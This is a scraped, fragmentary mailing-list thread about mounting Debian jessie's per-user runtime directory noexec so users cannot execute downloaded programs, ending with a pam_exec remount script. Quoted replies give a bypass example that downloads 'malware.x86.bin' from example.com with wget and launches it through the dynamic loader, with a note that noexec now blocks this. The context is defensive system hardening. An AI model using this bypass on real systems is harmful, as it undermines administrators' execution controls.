Thanks for all.
I solve my problem with pam_exec for /etc/pam.d/login,
/etc/pam.d/gdm-password by adding:
session require pam_exec.so /sbin/resources
/sbin/resources:
#!/bin/bash
mount $XDG_RUNTIME_DIR -o remount,noexec
I mean this tread closed.
___
On Mon, 16.02.15 22:14, Павел Самсонов (pvsamsono...@gmail.com) wrote:
If I have multiuser Linux installation with shell and DE access, my users
have not places in system, where they able download something from internet
and execute:
/ ro,exec
/home rw,noexec
/var rw,noexec
All tmpfs
On 16/02/15 18:14, Павел Самсонов wrote:
If I have multiuser Linux installation with shell and DE access, my
users have not places in system, where they able download something from
internet and execute:
...
/home rw,noexec
noexec is not sufficient to do what you have said. For instance,
Am 16.02.2015 um 21:02 schrieb Mantas Mikulėnas:
On Mon, Feb 16, 2015 at 9:40 PM, Reindl Harald wrote:
Am 16.02.2015 um 20:31 schrieb Mantas Mikulėnas:
On Mon, Feb 16, 2015 at 9:16 PM, Simon McVittie
wrote:
wget http://example.com/malware.x86.bin
Am 16.02.2015 um 20:31 schrieb Mantas Mikulėnas:
On Mon, Feb 16, 2015 at 9:16 PM, Simon McVittie
simon.mcvit...@collabora.co.uk mailto:simon.mcvit...@collabora.co.uk
wrote:
wget http://example.com/malware.__x86.bin
http://example.com/malware.x86.bin
/lib/ld-linux.so.2
If I have multiuser Linux installation with shell and DE access, my users
have not places in system, where they able download something from internet
and execute:
/ ro,exec
/home rw,noexec
/var rw,noexec
All tmpfs noexec
In Debian wheezy this done and work.
In Debian jessie I have places
On Mon, Feb 16, 2015 at 9:16 PM, Simon McVittie
simon.mcvit...@collabora.co.uk wrote:
wget http://example.com/malware.x86.bin
/lib/ld-linux.so.2 malware.x86.bin
Pretty sure this no longer works; these days noexec prevents
mmap(PROT_EXEC) as well.
--
Mantas Mikulėnas graw...@gmail.com
B1;3802;0cOn Sun, 15.02.15 16:31, Павел Самсонов (pvsamsono...@gmail.com) wrote:
Good day, I see a new Debian jessie, and I mean, that /var/run/pid
filesystems must be mounted with noexec options, so thay have user write
access. On some installations this very important. Were I may configure
Am 15.02.2015 um 13:31 schrieb Павел Самсонов:
Good day, I see a new Debian jessie, and I mean, that /var/run/pid
filesystems must be mounted with noexec options, so thay have user write
access. On some installations this very important. Were I may configure
this, or may be You change your
On Sun, Feb 15, 2015 at 04:31:24PM +0400, Павел Самсонов wrote:
Good day, I see a new Debian jessie, and I mean, that /var/run/pid
filesystems must be mounted with noexec options, so thay have user write
access. On some installations this very important. Were I may configure
this, or may be
10 matches
Mail list logo